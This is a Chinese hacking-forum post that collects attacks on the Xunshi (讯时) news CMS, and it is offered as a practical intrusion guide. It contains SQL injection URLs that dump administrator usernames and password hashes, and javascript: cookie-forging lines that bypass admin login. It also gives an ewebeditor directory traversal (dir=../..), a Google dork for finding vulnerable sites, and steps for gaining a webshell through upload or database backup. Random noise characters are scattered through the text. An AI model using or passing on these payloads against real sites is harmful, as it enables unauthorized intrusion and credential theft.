找回密码
 立即注册
查看: 3505|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘& x9 F) m( P5 @7 u3 {
0 p3 l8 z% t* M+ r' g- D, M( g' `
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
. R9 x' n- u% s. e
, O/ t: x3 x8 M3 {3 q以下本文总结来自黑防去年第9期杂志上的内容...
- @; u; p) |& P* v
  w! K8 e+ s( J2 u, j: m先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%* Z9 P! s& c2 H  v3 E

4 V8 z; U: A+ l; N, Z7 E. w26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 I  `% H. P9 |
/ }) n  Y2 x3 C0 s( K记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
  m7 [$ K, O% g/ D. `1 N5 P这里一个注入; s, J0 r0 Z0 n

1 q3 P6 o+ S* s效果如图:
/ k+ L: Q8 j: z0 Y3 m9 x
' O0 K+ f% p+ Q& f& c1 n - L# b1 t8 E) }
" I+ {1 ]1 h  Z5 x% L( `
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
& ?: e' V, s7 w, \" ~  H  \, n; l
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去/ u. h. l8 W/ o2 S' k& U8 t

, l/ Y0 i# S) E; Mjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
8 _" [( u4 K* I) R3 a
9 s- s2 H" G- }2 R  c( B& m那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:2 K2 z9 n' Q' Q( k, i' }

: f: w& _; {# l- A因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
! ?/ O" C" {8 N0 p( L$ b4 J. s" P. Q1 @+ `/ o
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
9 o2 e6 q0 |1 X* \9 O: C# Y& m
$ L& o3 \2 A- `6 A访问这页面来列目录..步骤如下:2 k3 X. `* P1 E2 I

9 b( @3 r+ d* n1 h; Pjavascript:alert(document.cookie="admindj=1")
  e* Y# c! [+ b4 m" W
- o4 l6 J/ `; U; E5 lhttp://www.political-security.co ... asp?id=46&dir=../..' L+ h- t0 `# N& z6 I4 p6 f
3 o9 G% T2 P3 e4 r5 i
效果如图:6 Y" F3 b7 {$ g& N" z, L

$ J$ }% n0 c7 u: d; i* G! i+ b , v- C7 x" v. [7 a- U- a
- \8 M% S! ]' \* L6 {$ j
这样全站目录都能瞧了..找到后台目录..进去..$ l% U) `' @* |5 V* _, }

; L4 ?) R) R, l6 N  v那么进了后台怎么拿shell??上传--备份就ok了..) n6 S1 L$ t* s' E; V0 \: d9 v

# L# `, r: l, z- Z5 t那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的.., T% Q% W9 e3 t2 H$ Y
- \& I9 T, j9 ?8 e: S$ P, T
这个我也碰到过一次..你都可以通过列目录来实现..
" k# z9 M7 R8 n4 M6 E: e( }& k9 T% F9 E+ ]* Q
javascript:alert(document.cookie="admindj=1")
+ l% q7 F0 Q9 v+ \8 c- e+ ?/ Y
4 s) G* Z) q# `  m0 n4 dhttp://www.political-security.co ... p?action=BackupData , D: q* G( Q2 m2 r
! O2 r' N* n0 q/ W
备份ok..7 V" Y2 \) T) U/ U

: j! M9 ]$ z* H, C8 W那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
' e( a; r  p3 \" Q  G  v) B2 K6 f
" S) F2 @( K2 F% e% N, w2 q% s在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" a6 U2 l7 Y& A2 E9 ~
% a8 d9 y+ b* u3 @5 f/ M然后访问此页面进行注入..步骤如下:2 z! ?5 P2 p1 y4 `# H
1 t0 p8 V/ v, m- E* d9 C5 P$ r
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")1 ~9 _) [- V6 O: k. D( G4 L

# T6 f0 q! ?( z* h3 a" B3 b然后请求admin/admin_chk.asp页面
0 O  b; Y0 v4 h  f+ T( L( J
2 x! E$ Q, P% t, F2 E输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
# S' J  R2 F9 m: J9 [6 o2 b9 [' W0 V' o. g% W' C
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin$ w' e2 d% C& I0 e
( A6 j  l3 l% s2 p" b; o' F& G
效果如图所示:  x) Q/ j2 l% g* K8 }4 J1 x
- J# n6 U- i7 C2 |

" }$ q0 D# M0 ]; z# s: E# `5 A' q  g0 Q' C" V6 G# B
讯时漏洞24 ?: ?1 y" ^9 N5 p3 |3 D
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧); {! P; j  \( s# P* ?6 Y& }
: `- r, q7 X9 Q3 K# R; l
1、/admin/admin_news_pl_view.asp?id=1( e' E3 `5 ~5 n5 @; A) L$ i
//id任意 填入以下语句
' g* t% n2 M& F/ {$ |" `
2 u( Z0 J/ q' E0 {2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
# N. t, e: A* X
- t( A0 p4 G$ [5 f
" ?/ F$ p7 T# N2 e1 w3 D
$ A8 n4 V1 H+ Z2 e( _. B* l3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='; B5 D$ n& H0 _. N8 S8 c% u' H
; p/ F% k' R1 A9 @1 O
1 w8 t4 E+ _: B4 J

: ~$ e* ?$ c: ]- S) ~6 c9 ?- p4 ?4 r爆出管理员帐号和密码了
# E! y! n* O2 h' m5 o+ x5 d) q( O% t" b , J/ i7 K8 P) j( r7 p6 d$ q( r; C
+ T5 l  W+ ^7 C3 l. c- a

! @% U% `- r2 z4、cookies进后台
$ m2 X, W/ V# c+ F7 K7 d0 k % n0 l+ h+ J3 m  e; n, P
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
1 |* p; M' i) b6 u
( ]5 G: F/ U; q+ L: a( D4 s
1 \# V4 W! D; G0 a) c1 y
, O8 z6 p8 |. m+ q" K* B5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
6 L: r8 {, G+ f. p* V4 s4 g5 E: h
+ H; O) @9 R. o0 t" ^+ I1 v2 P. H
) u* t3 l2 r! j4 B7 _. b4 }3 i' Q1 N4 H$ V8 T3 \! N
6、后台有上传和备份取SHELL不难。
3 r+ h* Z$ p5 m+ y" F1 o  e. v
, u6 g1 f7 x/ w# e# V2 d5 Q7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..  y) E( c2 b: E3 ?4 M

0 _& R4 |! t9 T" [3 {1 ^逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!: W7 R9 {( j7 T8 ]' r! k
0 I7 h2 U- [' O: m
' y8 Z+ C+ L* M! k6 T0 s
6 _# B' k' P$ L" L2 `0 z* M! n. `1 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表